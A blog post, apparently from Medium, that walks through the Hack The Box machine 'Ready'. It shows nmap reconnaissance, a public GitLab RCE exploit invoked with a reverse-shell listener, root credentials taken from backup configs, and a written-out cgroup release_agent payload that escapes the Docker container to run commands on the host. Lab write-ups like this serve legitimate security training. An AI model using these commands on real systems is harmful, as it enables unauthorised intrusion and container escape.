Hackthebox Ready WriteUp

Overview:

Reay is a interesting box that teaches Docker breakout. First off the start with a vulnerable gitlab that has a public exploit, After gotten into the box and realized it was inside a docker container and the container has a vulnerability that allows you to execute command outside the container and get code execution as root. With all the being said, Let’s just jump in!

Reconnaissance:

┌─[eu-vip-3]─[10.10.14.6]─[root@parrot]─[~/htb/boxes/ready]
└──╼ [★]$ nmap -sC -sV 10.10.10.220
Starting Nmap 7.91 ( https://nmap.org ) at 2021-05-15 10:09 BST
Nmap scan report for 10.10.10.220
Host is up (0.20s latency).
Not shown: 998 closed ports
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 8.2p1 Ubuntu 4 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 3072 48:ad:d5:b8:3a:9f:bc:be:f7:e8:20:1e:f6:bf:de:ae (RSA)
| 256 b7:89:6c:0b:20:ed:49:b2:c1:86:7c:29:92:74:1c:1f (ECDSA)
|_ 256 18:cd:9d:08:a6:21:a8:b8:b6:f7:9f:8d:40:51:54:fb (ED25519)
5080/tcp open http nginx
| http-robots.txt: 53 disallowed entries (15 shown)
| / /autocomplete/users /search /api /admin /profile
| /dashboard /projects/new /groups/new /groups/*/edit /users /help
|_/s/ /snippets/new /snippets/*/edit
| http-title: Sign in \xC2\xB7 GitLab
|_Requested resource was http://10.10.10.220:5080/users/sign_in
|_http-trane-info: Problem with XML parsing of /evox/about
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 21.40 seconds

There is http://10.10.10.220:5080/users/sign_in url on nmap scan, let’s hear over and can see a gitlab.

Create an account then login and check the version.

Search public exploits about this version and found a RCE exploit.

Usage:python3 exploit.py -u username -p password-g http://10.10.10.220 -l 10.10.14.x -P 443nc -nvlp 443

PriEsc to root:

On the /opt/backup there are config files and we can grep root’s password

After got root, I realized l’m in a docker container. But there is a blog below explains how to breakout docker.

Created payload based on above blog. It mounts the docker cgroup to /tmp then executes command outside the container, You can change cat /root/root.txt to a reverse shell if you want.

mkdir /tmp/cgrp && mount -t cgroup -o rdma cgroup /tmp/cgrp && mkdir /tmp/cgrp/x
echo 1 > /tmp/cgrp/x/notify_on_release
host_path=`sed -n 's/.*\perdir=\([^,]*\).*/\1/p' /etc/mtab`
echo '$host_path/cmd' > /tmp/cgrp/release_agent
echo '#!/bin/sh' > /cmd
echo "cat /root/root.txt > $host_path/output" >> /cmd
chmod a+x /cmd
sh -c "echo \$\$ > /tmp/cgrp/x/cgroup.procs"

As we can see it outputs the root flag to /output directory.

Christian, Studying Cyber Security and Digital Forensics, Security Consultant at 12security.com | OSCP

Love podcasts or audiobooks? Learn on the go with our new app.

Recommended from Medium

Consumer Data Right — Right or Wrong?

Generating Permutations In Python From Scratch

Gradle Management in Android Project

Spinnaker Install on VM, line by line

Debug your XDebug: Advanced troubleshooting, part 2— XDebug settings

Dreamforce21: My Takeaways & Thoughts

How to Become a Code Review Ninja

How objects can change your life

Get the Medium app

A button that says 'Download on the App Store', and if clicked it will lead you to the iOS App store
A button that says 'Get it on, Google Play', and if clicked it will lead you to the Google Play store
Jim Solomon

Jim Solomon

Christian, Studying Cyber Security and Digital Forensics, Security Consultant at 12security.com | OSCP

More from Medium

TryHackMe | Phishing Emails 1 Walkthrough

TryHackMe AoC3 — Day 3 Walkthrough

Shibboleth Write Up — Hack the box

TryHackMe — LazyAdmin (Easy)